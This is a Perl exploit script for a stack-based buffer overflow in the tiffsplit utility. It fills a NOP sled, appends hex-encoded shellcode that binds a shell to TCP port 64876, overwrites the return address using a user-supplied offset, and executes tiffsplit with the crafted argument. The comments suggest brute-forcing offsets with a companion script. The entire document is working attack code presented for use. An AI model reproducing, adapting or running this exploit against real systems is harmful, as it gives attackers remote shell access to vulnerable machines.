#!/usr/bin/perl
# tiffsplit argv[2] stack-based b0f
#
# On my b0x, offsets between 5000000 and 5500000
# aproximately works ( EIP: 0xbfb1ba7a )
#
# Mix it with brute.sh (included in the .tgz)
#
# nitrousenador[at]gmail[dot]com

$TIFFSPLIT =	"/usr/local/bin/tiffsplit";
$IMG =		"./fs.tif";	# extra

# PORTBIND 64876/tcp
# fork functionality - nitrous
# port bind - benn
$opc0dez =
"\x31\xc0\x83\xc0\x02\xcd\x80\x85\xc0\x75\x64\x6a".
"\x66\x58\x6a\x01\x5b\x31\xc9\x51\x6a\x01\x6a\x02".
"\x89\xe1\xcd\x80\x31\xd2\x52\x66\x68\xfd\x6c\x66".
"\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6".
"\x6a\x02\x5b\x6a\x66\x58\xcd\x80\x6a\x66\x58\x6a".
"\x04\x5b\xcd\x80\x31\xc9\x51\x51\x56\x89\xe1\x6a".
"\x05\x5b\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\xb0".
"\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f".
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89".
"\xe1\xcd\x80\x31\xc0\xfe\xc0\xcd\x80";

$len	= 1101;	# bytes to 0wn EIP
$stack	= 0xbffffffa;
$nop	= "\x90";

if(@ARGV == 1){
	$offset = $ARGV[0];
}
else{
	print STDERR "Usage: ", $0, " <offset>\n";
	exit -1;
}

$ret = pack('l', ($stack - $offset));
printf "Jumping to 0x%lx\n", ($stack - $offset);

for($k = 0; $k < ($len - length($opc0dez) - 4); $k++){
	$buffer .= $nop;
}

$buffer .= $opc0dez;
$buffer .= $ret;

exec($TIFFSPLIT, $IMG, $buffer) or die "Cannot execute $TIFFSPLIT\n";